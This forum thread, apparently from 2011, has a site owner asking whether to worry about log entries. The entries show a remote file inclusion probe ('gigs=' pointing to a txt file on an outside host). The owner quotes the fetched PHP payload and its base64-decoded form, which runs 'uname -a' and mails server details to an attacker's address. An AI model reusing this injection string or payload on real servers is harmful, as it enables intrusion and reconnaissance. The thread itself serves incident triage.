What Is This?? Server Log Entry...

Discussion in 'BlackHat Lounge' started by unknown00, Jun 2, 2011.

  1. unknown00

    unknown00 Regular Member

    Joined:
    Jun 6, 2009
    Messages:
    213
    Likes Received:
    74
    gigs=http://ibuybid.com/admin/htmlpurifier/configdoc/.svn/tmp/.acces/id.txt?
    IP: 91.121.70.32 |Date:
    -06-2011 / 07:44:21 (Date=0 EDT) libwww-perl/5.803

    gigs=http://ibuybid.com/admin/htmlpurifier/configdoc/.svn/tmp/.acces/id.txt?
    IP: 91.121.70.32 |Date:
    -06-2011 / 07:44:22 (Date=0 EDT) libwww-perl/5.803

    IP: 67.85.53.112 |Date:
    -06-2011 / 07:44:56 (Date=0 EDT) Mozilla/5.0 (PLAYSTATION 3; 1.00)

    gigs=http://ibuybid.com/admin/htmlpurifier/configdoc/.svn/tmp/.acces/id.txt?
    IP: 91.121.70.32 |Date:
    -06-2011 / 07:45:30 (Date=0 EDT) libwww-perl/5.803

    gigs=http://ibuybid.com/admin/htmlpurifier/configdoc/.svn/tmp/.acces/id.txt?
    IP: 91.121.70.32 |Date:
    -06-2011 / 07:45:31 (Date=0 EDT) libwww-perl/5.803

    when i goto the above link im prompted to open/download a txt file which i do....
    and this is what it looks like

    Code:
    <?
    $win = strtolower(substr(PHP_OS,0,3)) == "win";
    echo "PLaTo<br>";
    if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
    {
     $safemode = true;
     $hsafemode = "4ON6";
    }
    else {$safemode = false; $hsafemode = "3OFF6";}
    $xos = wordwrap(php_uname(),90,"<br>",1);
    $xpwd = @getcwd();
    $OS = "<<".$hsafemode.">> ".$xos."";
    echo "<center><A class=ria href=\"http://".$OS."\">";echo "PLaTo</A></center><br>";
    echo "<br>OSTYPE:$OS<br>";
    echo "<br>Pwd:$xpwd<br>";
    eval(base64_decode("aWYgKEBpbmlfZ2V0KCJzYWZlX21vZGUiKSBvciBzdHJ0b2xvd2VyKEBpbmlfZ2V0KCJzYWZlX21v
    ZGUiKSkgPT0gIm9uIikgeyAkc2FmZW1vZGUgPSAiT04iOyB9IGVsc2UgeyAkc2FmZW1vZGUgPSAi
    T0ZGIjsgfSAkdmlzaXRvciA9ICRfU0VSVkVSWyJSRU1PVEVfQUREUiJdOyAkZmxvYXQgPSAiRnJv
    bSA6IHZ1cmwgaW5mbyA8ZnVsbEBpbmZvLmNvbT4iOyAkYXJhbiA9IGV4ZWMoJ3VuYW1lIC1hOycp
    OyAkd2ViID0gJF9TRVJWRVJbIkhUVFBfSE9TVCJdOyAkaW5qID0gJF9TRVJWRVJbIlJFUVVFU1Rf
    VVJJIl07ICRib2R5ID0gIkJ1ZyBodHRwOi8vIi4kd2ViLiRpbmouIm5uU3ByZWFkIFZpYSA6ICIu
    JHZpc2l0b3IuIm5uS2VybmVsIFZlcnNpb24gOiAiLiRhcmFuLiJublNhZmUgTW9kZSA6ICIuJHNh
    ZmVtb2RlOyBtYWlsKCJnd2FkdWtAZ21haWwuY29tIiwiU2V0b3JhbiBCb3MgIi4kc2FmZW1vZGUs
    JGJvZHksJGZsb2F0KTs="));
    die("<center> ByroeNet </center>");
    ?>
    when i decode the base64 this is what i get

    Code:
    if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "ON"; } else { $safemode = "OFF"; } $visitor = $_SERVER["REMOTE_ADDR"]; $float = "From : vurl info <[email protected]>"; $aran = exec('uname -a;'); $web = $_SERVER["HTTP_HOST"]; $inj = $_SERVER["REQUEST_URI"]; $body = "Bug http://".$web.$inj."nnSpread Via : ".$visitor."nnKernel Version : ".$aran."nnSafe Mode : ".$safemode; mail("[email protected]","Setoran Bos ".$safemode,$body,$float);
    should i be worried???
     
  2. unknown00

    unknown00 Regular Member

    Joined:
    Jun 6, 2009
    Messages:
    213
    Likes Received:
    74
    no one have an idea??